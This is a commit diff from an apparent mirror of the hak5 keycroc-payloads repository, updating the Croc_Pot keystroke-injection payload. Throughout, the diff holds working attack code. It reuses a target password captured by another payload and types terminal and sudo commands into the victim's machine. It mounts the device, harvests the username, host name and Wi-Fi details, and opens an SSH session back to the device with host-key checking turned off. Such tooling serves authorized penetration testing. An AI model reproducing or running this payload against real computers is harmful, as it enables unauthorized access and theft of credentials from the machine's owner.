hak5
/
keycroc-payloads
mirror of https://github.com/hak5/keycroc-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update Croc_Pot_Payload.txt 

-update for raspberry pi now using default terminal
-fixes and minor changes
pull/28/head
spywill 2021-10-17 08:20:15 -04:00 committed by GitHub
parent c7928ab2df
commit f59038f1cb
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 31 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

62
payloads/library/general/Croc_Pot/Croc_Pot_Payload.txt
View File

@ -4,7 +4,7 @@
# (ip address, current user name, pc host name, ssid and passwd, mac address) # (ip address, current user name, pc host name, ssid and passwd, mac address)
# save to tools/Croc_pot folder # save to tools/Croc_pot folder
# Author: Spywill # Author: Spywill
# Version: 1.3.1 # Version: 1.3.3
# Category: Key Croc # Category: Key Croc
MATCH crocpot MATCH crocpot
@ -12,8 +12,13 @@ MATCH crocpot
#---> Edit KEYCROC_PASSWD_HERE #---> Edit KEYCROC_PASSWD_HERE
CROC_PW=hak5croc CROC_PW=hak5croc
#---> Check for target pc saved passwd run CrocUnlock payload first if not edit below
if [ -e "/root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered" ]; then
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else
#---> Edit LINUX-PC_PASSWD_HERE #---> Edit LINUX-PC_PASSWD_HERE
PC_PW=LINUX PC_PW=LINUX
fi
#---> Save keycroc passwd in temp folder #---> Save keycroc passwd in temp folder
#---> This is used for starting Reverse SSH Tunnel with Target PC #---> This is used for starting Reverse SSH Tunnel with Target PC
@ -94,7 +99,7 @@ WINDOWS)
ATTACKMODE HID ATTACKMODE HID
sleep 1 sleep 1
#---> Start SSH session with target PC #---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER Q ENTER
sleep 2 sleep 2
#---> Entering keycroc passwd #---> Entering keycroc passwd
@ -124,7 +129,7 @@ MACOS)
Q ENTER Q ENTER
sleep 2 sleep 2
#---> Start SSH session with target PC #---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER Q ENTER
sleep 2 sleep 2
#---> Entering keycroc passwd #---> Entering keycroc passwd
@ -147,16 +152,23 @@ LINUX)
#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value #---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
case $TARGET_HOSTNAME in case $TARGET_HOSTNAME in
raspberrypi) raspberrypi)
#---> Start Raspberry pi 4 terminal -->gnome-terminal installed<-- #---> Copy LXTerminal to desktop
Q GUI d Q GUI d
Q CONTROL-ALT-F1
sleep 1 sleep 1
Q STRING "terminal" Q STRING "cp -u /usr/share/applications/lxterminal.* /home/\$(whoami)/Desktop"
Q ENTER
Q ALT-F7
#---> Start Raspberry pi 4 LXTerminal
sleep 1
Q STRING "LXTerminal"
Q ENTER Q ENTER
Q ENTER Q ENTER
sleep 2 sleep 2
#---> Place keycroc usb drive into variable #---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER Q ENTER
sleep 1
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}" Q STRING "whoami | tee \${PC_USER}"
Q ENTER Q ENTER
@ -193,7 +205,7 @@ raspberrypi)
ATTACKMODE HID ATTACKMODE HID
sleep 1 sleep 1
#---> Start SSH session with target PC #---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER Q ENTER
sleep 2 sleep 2
#---> Entering keycroc passwd #---> Entering keycroc passwd
@ -214,24 +226,18 @@ parrot)
Q STRING "mate-terminal" Q STRING "mate-terminal"
Q ENTER Q ENTER
sleep 1 sleep 1
#---> Create keycroc directory #---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/" Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0; sudo chmod 777 /media/\$(whoami)/KeyCroc/; "
Q ENTER Q ENTER
sleep 1
#---> Entering Linux passwd #---> Entering Linux passwd
Q STRING "${PC_PW}" Q STRING "${PC_PW}"
Q ENTER Q ENTER
sleep 1 sleep 1
#---> Mount keycroc usb drive to target pc
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
Q ENTER
sleep 1
#---> Make KeyCroc folder executable
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Place keycroc usb drive into variable #---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER Q ENTER
sleep 1
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}" Q STRING "whoami | tee \${PC_USER}"
Q ENTER Q ENTER
@ -273,9 +279,9 @@ parrot)
#---> Remove keycroc directory off target pc #---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER Q ENTER
sleep 2 sleep 1
#---> Start SSH session with target PC #---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER Q ENTER
sleep 1 sleep 1
#---> Entering keycroc passwd #---> Entering keycroc passwd
@ -297,24 +303,18 @@ parrot)
Q STRING "xterm" Q STRING "xterm"
Q ENTER Q ENTER
sleep 1 sleep 1
#---> Create keycroc directory #---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/" Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0; sudo chmod 777 /media/\$(whoami)/KeyCroc/; "
Q ENTER Q ENTER
sleep 1
#---> Entering Linux passwd #---> Entering Linux passwd
Q STRING "${PC_PW}" Q STRING "${PC_PW}"
Q ENTER Q ENTER
sleep 1 sleep 1
#---> Mount keycroc usb drive to target pc
Q STRING "sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ -o rw,users,umask=0"
Q ENTER
sleep 1
#---> Make KeyCroc folder executable
Q STRING "sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER
sleep 1
#---> Place keycroc usb drive into variable #---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER Q ENTER
sleep 1
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt #---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | tee \${PC_USER}" Q STRING "whoami | tee \${PC_USER}"
Q ENTER Q ENTER
@ -356,9 +356,9 @@ parrot)
#---> Remove keycroc directory off target pc #---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/" Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER Q ENTER
sleep 2 sleep 1
#---> Start SSH session with target PC #---> Start SSH session with target PC
Q STRING "ssh root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)" Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER Q ENTER
sleep 1 sleep 1
#---> Entering keycroc passwd #---> Entering keycroc passwd